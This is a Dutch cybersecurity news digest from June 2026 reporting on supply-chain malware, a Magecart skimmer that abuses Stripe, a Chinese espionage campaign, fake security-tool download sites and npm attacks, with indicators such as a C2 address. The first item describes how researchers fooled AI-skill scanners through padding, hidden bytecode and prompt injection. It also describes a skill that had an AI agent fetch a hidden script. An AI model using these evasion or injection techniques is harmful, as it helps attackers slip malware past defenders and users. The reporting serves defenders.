Onderzoekers van Trail of Bits toonden aan dat aanvallers detectiemechanismen kunnen ontwijken met eenvoudige obfuscatietrucs en verpakkingstechnieken, in plaats van geavanceerde exploitatiemethoden. In een aanval gericht op ClawHub voegden de onderzoekers meer dan 100.000 nieuwe regeltekens in, waardoor kwaadaardige code buiten het inspectievenster van de scanner werd geduwd. Dit veroorzaakte truncatie in de analysepijplijn, waardoor schadelijke logica onopgemerkt bleef en geïntegreerde scan-engines, zoals Code Insight van VirusTotal, in verwarring werden gebracht.

Verder onderzoek naar de open-source skillscanner van Cisco en de skills.SH-integraties van Vercel onthulde aanvullende zwakke punten. Deze platforms zijn afhankelijk van een combinatie van statische analyse, patroonherkenning en inspectie gebaseerd op grote taalmodellen (LLM's). De onderzoekers van Trail of Bits ontdekten echter dat deze verdedigingsmechanismen kunnen worden gepasseerd wanneer kwaadaardige inhoud wordt verborgen in minder voor de hand liggende formaten, zoals gecompileerde Python-bytecode (.pyc) of bestanden gebaseerd op archieven, zoals .docx.

Een gedemonstreerde aanval betrof een ogenschijnlijk onschuldige skill voor tekstopmaak die gecompileerde Python-bytecode bevatte. Hoewel de zichtbare broncode onschadelijk leek, extraheerde de bytecode stiekem omgevingsvariabelen, wat potentiële data-exfiltratie mogelijk maakte. Omdat scanners zich voornamelijk richtten op leesbare bronbestanden, bleef de kwaadaardige payload onopgemerkt en werd deze als veilig geclassificeerd.

Een andere effectieve techniek maakte gebruik van indirecte uitvoeringspaden. Een skill instrueerde de AI-agent om operationele logica op te halen uit een document dat een verborgen script bevatte. Deze methode omzeilde zowel detectie gebaseerd op signatures als LLM-redenering, aangezien het kwaadaardige gedrag niet direct werd blootgesteld in de primaire skill-definitie.

Onderzoekers van Trail of Bits slaagden er ook in om promptinjectie te gebruiken om scanners gebaseerd op LLM's te manipuleren. In één voorbeeld vermomde een skill een configuratie van een kwaadaardig pakketregister als een standaard bedrijfsconfiguratie. Door het gedrag te presenteren als een legitieme bedrijfsvereiste, degradeerde de scanner het risico naar een lage ernst. De skill werd goedgekeurd, ondanks het potentieel om installaties van afhankelijkheden om te leiden naar infrastructuur onder controle van aanvallers.

Deze omzeilingen benadrukken fundamentele beperkingen in de huidige scanbenaderingen. Statische analyse heeft moeite met complexe of verborgen bestandsformaten, terwijl systemen gebaseerd op LLM's kunnen worden misleid door overtuigende of contextueel ingekaderde instructies. Bovendien creëren beperkingen zoals beperkte contextvensters en selectieve bestandsinspectie blinde vlekken die aanvallers herhaaldelijk kunnen exploiteren.

Het probleem wordt verergerd door de snelle groei van openbare marktplaatsen voor skills, waar gebruikers skills van derden kunnen installeren met minimale verificatie. In tegenstelling tot gecontroleerde omgevingen, geven deze platforms vaak prioriteit aan bruikbaarheid en snelheid boven strenge beveiligingscontroles, wat de blootstelling aan kwaadaardige uploads vergroot.

De onderzoekers van Trail of Bits concluderen dat geautomatiseerd scannen alleen onvoldoende is om ecosystemen van AI-skills te beveiligen. Ze bevelen aan om traditionele praktijken voor toeleveringsketenbeveiliging toe te passen, waaronder gecurateerde repositories, strikte toegangscontroles en versiepinnen. Totdat sterkere beveiligingsmaatregelen zijn ontwikkeld, wordt organisaties geadviseerd om alle openbare AI-skills als onvertrouwde code te behandelen en deze niet in gevoelige omgevingen te implementeren.

 

Bron: Trail of Bits

05 juni 2026 | Windows-versie Hola Browser gecompromitteerd met cryptominer

De versie van de Hola Browser voor Windows is gecompromitteerd in een aanval op de supply chain, waarbij een niet-aangegeven uitvoerbaar bestand is geleverd dat door onderzoekers is geïdentificeerd als een miner voor cryptocurrency. Deze compromittering werd ontdekt tijdens periodieke certificeringscontroles van de Hola Browser, als onderdeel van de AppEsteem certificeringstestprocedure die eerder met succes was doorlopen.

Hola is een Israëlisch bedrijf dat voornamelijk bekend staat om zijn Hola VPN, een dienst die gebruikers in staat stelt internetverkeer via de apparaten van andere gebruikers of via betaalde proxy-infrastructuur te routeren om geografische beperkingen te omzeilen en toegang te krijgen tot content uit verschillende landen. De Hola Browser is gebaseerd op Chromium en integreert functionaliteit voor VPN en proxy rechtstreeks in de browser. Het bedrijf en zijn producten hebben in het verleden kritiek gekregen vanwege ondoorzichtige praktijken voor verkeersafhandeling, die verband hielden met de exploitatie van een commerciële dienst genaamd Luminati Networks, waarbij gratis gebruikers werden omgezet in proxy's.

Tijdens de meest recente controles op de integriteit van de applicatie hebben Sophos en andere bedrijven gespecialiseerd in cybersecurity, die betrokken waren bij het evaluatieproces, een niet-aangegeven uitvoerbaar bestand met de naam ‘me.exe’ ontdekt. Dit bestand werd in sommige gevallen geïnstalleerd onder C:\Program Files\Hola\. Het bestand was niet gecertificeerd, had geen tijdstempel, was niet digitaal ondertekend, bevatte geobfusceerde code en kon naar het geheugen schrijven. Bij nader onderzoek vond Sophos aanwijzingen dat het binaire bestand een Monero cryptocurrency-miner was, inclusief tekenreeksen die wezen op de ware aard ervan.

De miner voegt een uitzonderingsregel toe voor Windows Defender, kopieert zichzelf naar Program Files als ‘HolaMonitorService.exe’, creëert een automatisch startende service voor Windows genaamd ‘hola_monitor_svc’ en wordt uitgevoerd wanneer de computer inactief is.

Hola werd door AppEsteem op de hoogte gebracht van de bevindingen en bevestigde dat het bedrijf een compromittering van de supply chain had ondergaan. Deze compromittering werd ook onafhankelijk gedetecteerd door het cybersecuritybedrijf Sygnia. Desondanks stelt de softwareleverancier dat slechts ongeveer 0,1% van zijn gebruikers is getroffen en dat er geen bewijs is van toegang tot gebruikersdata, diefstal of compromittering daarvan. Avi Raz Cohen, CEO van Hola, verzekerde: "We hebben sindsdien onze distributiepijplijn volledig herbouwd, geavanceerde verificatie van code-signing geïmplementeerd en strengere toegangscontroles en continue monitoring in onze infrastructuur geïntroduceerd. Deze maatregelen zijn ontworpen om te garanderen dat alleen aangegeven, gecertificeerde en ondertekende componenten aan onze gebruikers worden geleverd." BleepingComputer heeft contact opgenomen met Hola voor meer informatie over hoe de inbreuk heeft plaatsgevonden, wie de daders zijn en of cliënten op andere platforms ook zijn getroffen, maar heeft tot op heden geen reactie ontvangen.

 

Bron: Sophos | Bron 2: hubs.li

05 juni 2026 | campagne van Magecart misbruikt Stripe voor opslag gestolen creditcardgegevens

Een nieuwe campagne van Magecart maakt misbruik van de API-infrastructuur van Stripe om zowel de payload voor diefstal van creditcardgegevens als de geëxfiltreerde data van afrekenpagina's te hosten. Deze kwaadaardige activiteit is volledig afhankelijk van Google Tag Manager (GTM) en Stripe-domeinen, te weten googletagmanager.com en api.stripe.com, die door online winkels impliciet worden vertrouwd.

De nieuwe malwarefamilie is ontdekt door onderzoekers van e-commerce beveiligingsbedrijf Sansec. Zij stelden vast dat de kwaadaardige code wordt geladen vanuit een Google Tag Manager-container en wordt uitgevoerd op elke pagina die deze laadt. Volgens Sansec bewegen zowel de payload als de gestolen creditcards via api.stripe.com. Aangezien winkels dit domein standaard toestaan, glipt de skimmer langs Content Security Policy (CSP)-regels en netwerkfilters die verkeer naar een onbekend skimmerdomein anders zouden detecteren.

Google Tag Manager is een beheersysteem waarmee website-eigenaren scripts voor analyses, advertenties en tracking kunnen toevoegen en beheren zonder de broncode van de site te wijzigen. Stripe is een veelgebruikt platform voor betalingsverwerking dat door online winkels wordt ingezet voor het accepteren van creditcards, het beheren van klantbestellingen en het afhandelen van facturatie.

De kwaadaardige code is volgens Sansec ingebed in legitiem ogende GTM-containers, die activeren wanneer een klant een afrekenpagina bereikt. Vervolgens wordt de Stripe API opgeroepen voor een specifiek klantenrecord, in dit geval `cus_TfFjAAZQNOYENR`. Uit de metadata-velden van dit record leest de malware JavaScript-code die het opnieuw samenstelt en vervolgens uitvoert met `new Function()`. De creditcard-skimmer richt zich op Magento- en Adobe Commerce-afrekenpagina's en probeert betalingsgegevens (creditcardnummer, vervaldatum, CVV-code, naam van de klant), evenals factuur- en e-mailadressen en telefoonnummers vast te leggen.

De gestolen gegevens worden samengevoegd tot één string, geobfusceerd met een XOR-bewerking en lokaal opgeslagen in plaats van onmiddellijk te worden geëxfiltreerd. Het ophalen van de gegevens gebeurt via een afzonderlijke routine, die direct na het laden van een pagina en vervolgens elke minuut wordt uitgevoerd. Hierbij wordt de datablob in tweeën gesplitst, een nieuw Stripe-klantobject aangemaakt en de gestolen gegevens opgeslagen in metadata-velden. Elke gestolen betaalkaart wordt zo een nep-klantenrecord in het Stripe account van de aanvaller, waardoor Stripe als opslagbackend voor gestolen gegevens fungeert. Zodra de gegevens zijn gekopieerd, wordt het lokale bestand gewist om sporen van de aanval te elimineren en dubbele uploads te voorkomen.

Sansec heeft ook een variant van de aanval ontdekt waarbij Google Firestore, een clouddatabaseservice voor gegevensopslag en realtime-opvraging, wordt gebruikt in plaats van Stripe. In die versie van de campagne wordt de payload opgehaald uit een Firestore-document genaamd `tracking/captcha` in een project met de naam `braintree-payment-app`. De gestolen gegevens worden daar opgeslagen in een andere `localStorage`-sleutel, `_d_data_customer_`. De namen van het document en het project helpen de malware op te gaan in legitiem betaal- en botbeveiligingsverkeer. Het Stripe-klantenrecord dat de skimmer bevatte, werd naar verluidt op 24 december 2025 aangemaakt, wat suggereert dat de operatie ten minste sinds die datum actief is. Klanten kunnen zich tegen dergelijke risico's beschermen door eenmalige virtuele kaarten met ingestelde limieten te gebruiken.

 

Bron: Sansec | Bron 2: hubs.li

05 juni 2026 | Chinese dreigingsactor VerdantBamboo misbruikt MSP’s voor complexe aanvallen

Op 05 juni 2026 heeft Volexity details onthuld over de Chinese dreigingsactor VerdantBamboo, ook bekend als WARP PANDA of UNC5221. Deze groep is verantwoordelijk voor geavanceerde aanvallen waarbij Managed Services Providers (MSP’s) worden misbruikt om toegang te krijgen tot doelwitorganisaties. De bevindingen kwamen voort uit een incidentrespons-onderzoek dat in september 2025 startte, nadat verdacht netwerkverkeer werd waargenomen vanuit een virtuele machine op Linux-basis.

Het incident begon met een Egnyte Storage Sync systeem op het netwerk van een klant. Volexity ontdekte dat dit systeem verbinding maakte met een door de dreigingsactor beheerd domein achter IP-adressen van Cloudflare, in plaats van met een legitiem Egnyte-domein. Bovendien maakte de appliance TLS-verbindingen met Google’s publieke DNS-server (8.8.8.8) voor DNS over HTTPS-queries.

Uit analyse bleek dat VerdantBamboo het Storage Sync systeem had gecompromitteerd met behulp van de BRICKSTORM malware. Deze backdoor is eerder beschreven in rapporten van onder andere CISA, Google Cloud en NVISO. De dreigingsactor kreeg via de web SSL VPN van de slachtofferorganisatie toegang tot de appliance. Met de proxy-mogelijkheden van de malware en gestolen inloggegevens wist VerdantBamboo de Microsoft 365-omgeving (M365) van het slachtoffer te benaderen. Volexity schat met grote zekerheid in dat dit gebeurde om legitiem netwerkverkeer na te bootsen en Conditional Access-beleid te omzeilen.

Verder onderzoek toonde aan dat de initiële compromittering al minstens 18 maanden eerder had plaatsgevonden. Nadat de eerste herstelwerkzaamheden waren afgerond, keerde VerdantBamboo terug. Ze braken opnieuw in bij de slachtofferorganisatie door verbinding te maken met de firewall via gestolen administratieve inloggegevens. Deze toegang werd gebruikt om web SSL VPN-toegang in te schakelen en te configureren, waarna interne systemen werden benaderd en extra op maat gemaakte malware op een Synology NAS-apparaat werd geïmplementeerd.

Tijdens het onderzoek stelde Volexity vast dat VerdantBamboo ook de Managed Services Provider (MSP) van het slachtoffer had gecompromitteerd. Na een onderzoek van het MSP-netwerk bleek dat de pfSense-firewall van de MSP was geïnfecteerd met een BSD-variant van BRICKSTORM. Deze compromittering had eveneens minstens 18 maanden eerder plaatsgevonden. Volexity concludeert met redelijke zekerheid dat de slachtofferorganisatie indirect was gecompromitteerd via de inbraak bij de MSP.

Forensisch onderzoek van het Storage Sync systeem en de pfSense-firewall leidde tot de ontdekking van meerdere BRICKSTORM-backdoor-samples. Volexity vond later ook een BRICKSTORM-sample op een uitgeschakelde virtuele machine, een legacy Linux-gebaseerde GroupWise-server die werd gebruikt voor gearchiveerde e-mailberichten.

Naast BRICKSTORM identificeerde Volexity twee voorheen ongedocumenteerde malwarefamilies: PLENET en AGENTPSD. PLENET is geschreven in .NET Core en gecompileerd naar native code met behulp van Native AOT-functionaliteiten voor Linux systemen; Google Cloud noemde deze malware "GRIMBOLT". AGENTPSD, geschreven in Python en gecompileerd met PyInstaller, heeft beperkte functionaliteit en diende waarschijnlijk als fallback-backdoor. De aanvalsketen en de mogelijkheden van AGENTPSD, BRICKSTORM en PLENET worden uitgebreid beschreven in het rapport van Volexity.

 

Bron: Volexity | Bron 2: virustotal.com | Bron 3: learn.microsoft.com

05 juni 2026 | Hackers imiteren security tools voor malware via valse downloadsites

Hackers hebben overtuigende nepwebsites opgezet die populaire security tools imiteren om gebruikers te verleiden malware te downloaden. Deze sites zijn professioneel ontworpen en lijken vrijwel identiek aan de officiële projectpagina's, inclusief links naar daadwerkelijke GitHub-repositories. Echter, zodra een gebruiker op de downloadknop klikt, worden slachtoffers via een verborgen verkeersfiltersysteem, bekend als een Traffic Distribution System (TDS), omgeleid.

Dit TDS fungeert als een poortwachter en bepaalt welke gebruikers worden doorgestuurd naar malware en welke een onschadelijk bestand ontvangen. Het systeem screent op locatie, browsertype, VPN-gebruik en de mogelijke aanwezigheid van een security onderzoeker, wat detectie en identificatie van de aanval bemoeilijkt.

Analisten van Check Point Research hebben deze grootschalige campagne onderzocht en ontdekten dat de nepwebsites een JavaScript-script laden dat wordt gehost op het CloudFront-netwerk van Amazon. Dit script onderschept de eerste downloadklik en stuurt de gebruiker onzichtbaar door naar het TDS, zonder dat er zichtbaar iets ongebruikelijks gebeurt. Check Point meldt dat de operatie specifiek gericht is op tools die door security professionals worden gebruikt, waaronder Ghidra, dnSpy en SpiderFoot.

De campagne is al minstens sinds december 2025 actief, waarbij de levering van malware vanaf begin januari 2026 is bevestigd. Telemetrie van VirusTotal toont meer dan 5.000 inzendingen die gekoppeld zijn aan gerelateerde samples, en onderzoekers merken op dat de werkelijke blootstelling waarschijnlijk veel hoger is. Het feit dat de geïmiteerde tools dagelijks worden gebruikt door security onderzoekers, maakt deze campagne bijzonder zorgwekkend, aangezien het de mensen treft die getraind zijn om dergelijke bedreigingen te herkennen.

Drie verschillende malwarefamilies dienen als uiteindelijke payloads. RemusStealer is een nieuw opgedoken infostealer die data van meer dan 20 browsers steelt, waaronder cryptocurrency wallets, password managers en tools voor twee-factor authenticatie. AnimateClipper monitort stilletjes het klembord en verwisselt gekopieerde walletadressen met door aanvallers gecontroleerde adressen, waardoor mogelijk echte fondsen worden omgeleid zonder dat het slachtoffer dit merkt. Een derde payload, genaamd SessionGate, is een multi-stage loader met zware obfuscation en een eenmalige sleutellevering, wat analyse buitengewoon moeilijk maakt.

Meer dan 100 actieve nepwebsites zijn geïdentificeerd in dit cluster, die allemaal dezelfde CloudFront-gehoste scripts en campagne-identificatoren delen. Sites zoals ghidralite[.]com en dnspy[.]org verschijnen bovenaan de Google-resultaten voor relevante zoekopdrachten, wat hen een vals gevoel van autoriteit geeft. Wanneer een gebruiker de muis over de downloadknop beweegt, toont de statusbalk van de browser zelfs een echte GitHub-URL, zodat voorzichtige gebruikers mogelijk niets verkeerds opmerken. Het JavaScript dat door deze pagina's wordt geladen, luistert naar de eerste interactie van de gebruiker en onderschept deze voordat de normale navigatie kan plaatsvinden. Op Chrome legt het een mousedown-event vast; op Firefox gebruikt het een click-event. Vervolgens genereert het een TDS runtime URL, leidt de gebruiker stilzwijgend om en annuleert de oorspronkelijke navigatie volledig. Het slachtoffer belandt ergens totaal anders dan de bedoeling was, en het hele proces is onzichtbaar.

SessionGate onderscheidt zich door zijn agressieve weerstand tegen analyse. Het oorspronkelijk gedownloade bestand is een 7-Zip-archief van ongeveer 20 MB, maar het eigenlijke uitvoerbare bestand erin is slechts 15 MB, waarbij de resterende 5 MB bestaat uit geobfusceerde loadercode die is ontworpen om tools zoals de decompiler van IDA te omzeilen. Functies kunnen meer dan 500 KB groot zijn, en versleutelde strings worden in coderuimtes geplaatst om disassemblers verder te verwarren. De decryptiesleutel voor de laatste payload-fase wordt server-side gegenereerd en slechts één keer per slachtoffersessie vrijgegeven. Als een onderzoeker de keten vanaf een ander IP-adres probeert te herhalen, retourneert de server een geldig ogende maar nutteloze sleutel, waardoor de payload volledig onleesbaar wordt.

Security teams wordt sterk aangeraden om software uitsluitend van officiële projectpagina's of geverifieerde repositories te downloaden, bestands-hashes na het downloaden te verifiëren en actief uitgaande verbindingen naar de Command & Control (C2) domeinen en infrastructuur die in deze campagne zijn geïdentificeerd, te monitoren.

 

Bron: Check Point Research | Bron 2: research.checkpoint.com

05 juni 2026 | Nieuwe IronWorm malware infecteert 36 npm-pakketten in supply-chain aanval

Een nieuwe aanval op de supply chain heeft 36 pakketten in de Node Package Manager (npm) index geïnfecteerd met de infostealer malware genaamd IronWorm. Deze malware, geschreven in Rust, is ontworpen om 86 omgevingsvariabelen en 20 credential-bestanden te stelen. Hieronder vallen onder andere OpenAI-, AWS-, Anthropic- en npm-referenties, configuratiebestanden van vaults, SSH-sleutels en Exodus cryptocurrency wallet-bestanden.

Onderzoekers van JFrog, een bedrijf gespecialiseerd in supply chain en devops, meldden dat IronWorm zich verbergt achter een eBPF kernel rootkit en communiceert met de operator via het netwerk van Tor. De Rust-gebaseerde malware verspreidt zichzelf door gestolen referenties te gebruiken voor publicatie op npm, inclusief geheimen die zijn gekoppeld aan npm's Trusted Publishing workflow. Zodra een ontwikkelaar of CI-omgeving is gecompromitteerd, kan de malware getrojaniseerde versies van pakketten publiceren die eigendom zijn van het slachtoffer, waardoor vervolgens extra ontwikkelaars en CI-systemen worden geïnfecteerd.

Dit gedrag vertoont conceptuele overeenkomsten met Shai Hulud, waarvan de code onlangs op GitHub werd gepubliceerd. Hoewel JFrog-onderzoekers geen duidelijke connectie vonden tussen IronWorm en Shai Hulud, observeerden ze wel dezelfde commit-namen in beide supply-chain aanvallen. Dit opent de mogelijkheid dat de nieuwe malware een evolutie is van de payload van TeamPCP, aangezien IronWorm een "op maat gemaakt, zorgvuldig gebouwd implantaat van een operatie met eigen infrastructuur" lijkt te zijn.

Volgens JFrog begon de recente aanval vanuit een gecompromitteerd account genaamd 'asteroiddao', dat pakketversies publiceerde die een Rust ELF-binary bevatten, uitgevoerd via 'preinstall'. Malafide commits werden vervolgens in repositories gepusht. De auteur van de commits verschijnt als "claude", en de tijdstempels wijzen op enkele jaren geleden, in sommige gevallen zelfs tot 13 jaar, hoewel ze pas de afgelopen dagen zijn gepusht. Dit is waarschijnlijk bedoeld om onderzoek te omzeilen.

Een opmerkelijk element in de bevindingen van JFrog is een mechanisme dat afhankelijk is van GitHub Actions om de gestolen geheimen te leveren. JFrog legt uit dat de malware de geheimen serialiseert tot één enkele waarde en deze vervolgens "wegschrijft naar een onschuldig ogend bestand, alsof het lint- of formatteringsoutput betreft". De laatste stap van het proces is het uploaden van het bestand als een build-artefact, dat door iedereen met toegang kan worden gedownload. Op deze manier kan de dreigingsactor een externe command-and-control (C2) volledig vermijden. De onderzoekers merken echter op dat dit leveringsmechanisme niet is gebruikt in de geanalyseerde IronWorm supply-chain aanval.

Een andere bijzonderheid is dat de operator de herstelzin van zijn eigen cryptocurrency wallet had vastgelegd in de code. De onderzoekers stellen dat de enige reden hiervoor is dat de dreigingsactor niet wilde dat de malware deze zou stelen tijdens de testfase.

Het applicatiebeveiligingsbedrijf Ox Security meldde dat de IronWorm-aanval zeer vroeg werd gedetecteerd en gestopt voordat deze zich kon verspreiden naar populairdere pakketten op npm. Het bedrijf heeft een lijst gepubliceerd van alle getroffen pakketnamen en hun versies, en adviseert ontwikkelaars om te upgraden naar gefixte releases, hun sleutels te roteren en twee-factor authenticatie (2FA) in te schakelen voor alle accounts. Tegelijkertijd hebben Endor Labs en StepSecurity een zeer vergelijkbare, maar afzonderlijke aanval waargenomen met JavaScript-gebaseerde malware genaamd binding.gyp, die registry poisoning en GitHub Actions-infectie uitvoerde in hetzelfde tijdsbestek.

 

Bron: JFrog | Bron 2: ox.security | Bron 3: endorlabs.com

05 juni 2026 | Forumdraad onthult handleiding voor monetarisatie van kwetsbaarheden

Een recente discussie op een ondergronds forum, getiteld "Hacking for Profit. Working method", biedt een zeldzame inkijk in de manier waarop cybercriminelen informatie over de exploitatie van kwetsbaarheden en hacktechnieken delen. De post, geschreven door een actor genaamd "Hercules", is niet bijzonder lang of technisch, maar blinkt uit in het opdelen van een complex proces in duidelijke, uitvoerbare stappen. Het behandelt het scannen, detecteren, beoordelen, exploiteren en te gelde maken van kwetsbaarheden, en geeft inzicht in de betekenis van vulnerability disclosure programma’s.

Onderzoekers van Flare analyseerden de originele post en de reacties daarop gedurende enkele maanden. De activiteit rondom de draad toonde aan dat de invloed ervan verder reikte dan de initiële publicatie. Meerdere gebruikers bedankten "Hercules", vroegen om privécontact, identificeerden zichzelf als beginners of gaven aan begeleiding te zoeken om van theoretische kennis naar praktische hacking over te stappen. Het succes van de post was zo groot dat de methode werd herplaatst en besproken op vier extra forums, wat aantoont hoe "Hercules" beginnende dreigingsactoren een eenvoudig raamwerk biedt voor het begrijpen van de exploitatie van kwetsbaarheden en het verdienen van geld hiermee.

De handleiding van "Hercules" legt uit hoe een ontdekte kwetsbaarheid te gelde kan worden gemaakt. Het begint met advies over het zoeken naar recentelijk openbaar gemaakte kwetsbaarheden, met name kwetsbaarheidsklassen met een grote impact, zoals remote code execution, authenticatie bypass, accountovername, IDOR (Insecure Direct Object Reference) en data-expositie. Vervolgens wordt ingegaan op het identificeren van blootgestelde systemen, het valideren of deze systemen kwetsbaar zijn, en het beslissen of de resultaten moeten worden gerapporteerd, verkocht of geëxploiteerd.

Drie aspecten vallen op in de handleiding van de dreigingsactor: het gebruik van het Nuclei framework van projectdiscovery.io, een populaire tool onder offensive security professionals; het inzicht in de uitdagingen waarmee verdedigers worden geconfronteerd bij het patchen van nieuw ontdekte kwetsbaarheden; en de verdeling van de handleiding in een "legale" en een "illegale" sectie. Dit betekent dat lezers in elke fase kunnen beslissen om van kwetsbaarheidsmelding over te stappen op hacking.

Het meest effectieve deel van de handleiding is niet een technische truc, maar de toon. "Hercules" schrijft in duidelijke taal en presenteert het proces als iets dat door actie kan worden geleerd. Hij stelt dat veel tutorials zich te veel richten op computerwetenschappen, besturingssystemen, programmeren of scannerparameters, terwijl beginners willen "hacken", "inbreken" en "toegang krijgen". Hij suggereert ook dat gebruikers geen geavanceerde software engineers hoeven te zijn om te beginnen. Publieke tools, community templates, automatisering en zelfs assistentie van AI worden gepresenteerd als manieren om de drempel te verlagen, terwijl programmeervaardigheden als nuttig maar niet verplicht worden beschreven. De onderliggende boodschap is simpel: de technische kloof is kleiner dan beginners denken. Deze boodschap verklaart een groot deel van de forumreacties, waarin gebruikers aangaven ondanks vele cursussen nog niet praktisch te kunnen hacken, of vroegen of gebrek aan programmeerkennis een probleem zou zijn. De handleiding nodigt lezers uit contact op te nemen voor verdere begeleiding.

 

Bron: Flare | Bron 2: projectdiscovery.io | Bron 3: aquasec.com

05 juni 2026 | NCSC adviseert ontwikkelaars tegen automatische installatie van softwarepakketten

Het Britse National Cyber Security Centre (NCSC) heeft softwareontwikkelaars geadviseerd om packages en andere updates van afhankelijkheden niet langer automatisch te installeren. In plaats daarvan dienen deze eerst handmatig te worden gecontroleerd. Dit advies volgt op een eerdere aanbeveling van het Amerikaanse cyberagentschap CISA, dat ontwikkelaars opriep om minstens drie uur te wachten met de installatie van nieuwe packages. De aanleiding voor deze waarschuwingen zijn de toegenomen aanvallen op software supply chains waarmee veel organisaties recentelijk te maken hebben gehad.

De afgelopen weken is gebleken dat aanvallers diverse packages op platforms zoals GitHub, npm of de Python Package Index (PyPI) hebben voorzien van malware. Softwareontwikkelaars die voor hun projecten gebruikmaken van deze packages en de geïnfecteerde versies installeerden, raakten hierdoor zelf geïnfecteerd. De malware was vervolgens in staat om inloggegevens, tokens, keys en andere credentials van deze ontwikkelaars te stelen. Hierdoor konden ook hun softwareprojecten worden geïnfecteerd, wat een breed risico vormt voor de uiteindelijke gebruikers van de software.

Het Britse NCSC benadrukt dat softwareontwikkelaars direct een aantal concrete maatregelen kunnen treffen om de risico's te beperken. Een van de belangrijkste aanbevelingen is het handmatig controleren van alle nieuwe updates, afhankelijkheden en versies voordat deze worden geïmplementeerd. Daarnaast adviseert de Britse overheidsdienst om in het geval van een vermoedelijke aanval op de supply chain de automatische updates van afhankelijkheden te pauzeren. Het is tevens essentieel dat ontwikkelaars een duidelijk overzicht hebben van alle afhankelijkheden die binnen hun projecten worden gebruikt. Tot slot wordt aangeraden om een evenwicht te vinden tussen het snel installeren van beveiligingspatches en het langzamer updaten van externe afhankelijkheden, om zo de potentiële impact van een succesvolle aanval te minimaliseren. Dit strategische uitstel kan cruciale tijd bieden voor het detecteren en mitigeren van besmette updates.

 

Bron: NCSC

05 juni 2026 | Lazarus Group gebruikt npm brandjacking om ontwikkelaars te targeten

De Lazarus Group uit Noord-Korea heeft een nieuwe npm-campagne gelanceerd die zich richt op ontwikkelaars. Deze campagne maakt gebruik van misleidende pakketnamen om toegang te verkrijgen tot de systemen en software build-omgevingen van ontwikkelaars. Sonatype Security Research volgt tientallen kwaadaardige npm-pakketten die aan deze campagne gekoppeld zijn. Sommige van deze pakketten bereikten tot wel 500 wekelijkse downloads. De pakketten zijn zo ontworpen dat ze gerelateerd lijken aan vertrouwde JavaScript-projecten en tools, wat de kans vergroot dat ontwikkelaars ze installeren tijdens hun normale werkzaamheden.

In tegenstelling tot de gebruikelijke typosquatting-technieken, waarbij hackers misbruik maken van spelfouten, vond Sonatype dat in dit geval brandjacking-methoden werden toegepast. Dit omvat onder andere de toevoeging van achtervoegsels, het inbedden van projectnamen en het nabootsen van versienummers. Onderzoekers zagen voorbeelden van namen die waren opgebouwd rond bekende projecten zoals Buffer, Chai, React, Express, JWT en Webpack. Deze naamgevingsstrategie is effectiever voor aanvallers, omdat npm veel kleine hulpbibliotheken, wrappers en plugins bevat. Een pakket genaamd `buffer-utilities`, bijvoorbeeld, kan een legitieme aanvulling lijken op het veelgebruikte buffer-pakket, zelfs als er geen echte verbinding is met het project.

De analyse van Sonatype van `buffer-utilities` toonde aan dat het pakket gekopieerde code van de echte buffer-bibliotheek bevatte, maar ook functioneerde als een kwaadaardige dropper. Na installatie decodeerde het Base64-gecodeerde URL's, haalde het externe inhoud op van `www.jsonkeeper.com` en voerde het de opgehaalde code uit met `eval()`. Onderzoekers stelden vast dat dit patroon ook in andere pakketten, die aan dezelfde Lazarus-activiteit zijn gekoppeld, voorkwam. Het gebruik van `www.jsonkeeper.com` is eveneens opmerkelijk, aangezien Sonatype Lazarus eerder heeft waargenomen bij het hosten van payloads via deze service.

Nadat de eerste fase is uitgevoerd, kan de malware een Node.js-backdoor en downloader installeren. Deze payload verzamelt basis systeemdetails, waaronder de hostnaam, gebruikersnaam, besturingssysteem, home-directory en procesargumenten. Vervolgens maakt het contact met de command and control-infrastructuur om verdere instructies te ontvangen. De malware kan ook een verborgen .vscode-directory aanmaken in de home-map van de gebruiker, meer bestanden downloaden en door de aanvaller beheerde JavaScript als een losgekoppeld achtergrondproces starten. Sonatype meldde dat het pakket een payload van de derde fase, genaamd `f.js`, kan ophalen, samen met een `package.json-bestand`, waarna het `npm install --silent` uitvoert voordat de payload wordt gestart. Dit gedrag stelt de aanvaller in staat om toegang te behouden en kwaadaardige bestanden over tijd te vernieuwen. Sonatype rapporteerde ook een updatemechanisme dat de payload in staat stelt opnieuw verbinding te maken met command and control-servers, te controleren op nieuwere versies en lokale bestanden te vervangen.

De campagne toont aan waarom npm aantrekkelijk blijft voor geavanceerde dreigingsactoren. Ontwikkelaars installeren vaak pakketten op basis van naamsbekendheid, projectgeschiktheid of gemak, vooral in JavaScript-omgevingen waar kleine afhankelijkheden veelvoorkomend zijn. De link met de Lazarus Group geeft gewicht aan de bevindingen. Hoewel de groep vaak wordt geassocieerd met financiële diefstal en spionageoperaties van hoog profiel, toont deze activiteit de interesse van de groep in machines van ontwikkelaars, inloggegevens, build-systemen en langdurige toegang tot bedrijfsomgevingen.

Organisaties die `buffer-utilities` versie 1.0.0 of pakketten die geassocieerd zijn met Sonatype-identificatie `sonatype-2026-003558` hebben geïnstalleerd, moeten deze verwijderen en de getroffen systemen controleren op tekenen van verdere compromittering. Sonatype waarschuwde dat verwijdering alleen mogelijk niet voldoende is als latere payloads al zijn uitgevoerd. Beheerders moeten ook controleren op netwerkverbindingen met `www.jsonkeeper.com`, command and control-verkeer naar `45.59.163.198:1244`, onverwachte .vscode-mappen in home-directories van gebruikers, ongebruikelijke Node.js-processen en onverklaarde toegang tot inloggegevens vanaf werkstations van ontwikkelaars of build-systemen.

 

Bron: Sonatype

05 juni 2026 | Grootschalige malwarecampagne misbruikt nagemaakte open source websites en TDS

Cybersecurity onderzoekers hebben een grootschalige operatie blootgelegd die legitieme open source en freeware projecten nabootst. Het doel is om onwetende gebruikers via een Traffic Distribution System (TDS) naar kwaadaardige software te leiden, waaronder de Remus Stealer, AnimateClipper en het SessionGate framework.

Alexey Bukhteyev, security onderzoeker bij Check Point, legt uit dat "de websites goed zijn ontworpen en bij een snelle blik vaak legitieme projectportalen lijken, soms zelfs verwijzend naar echte bronnen. De misleiding zit niet alleen in de inhoud van de pagina, maar vooral in wat er gebeurt wanneer een gebruiker interactie heeft."

Deze nagemaakte pagina’s laden een via CloudFront gehoste JavaScript staging laag. Deze laag zet een klik op een download knop of link om in een doorverwijzing naar een TDS. Het TDS hanteert strikte controlemechanismen, waaronder de status van het eerste bezoek, verplichte klikbevestiging, anti-bot en anti-analyse logica, VPN en datacenter filtering, en frequentielimieten.

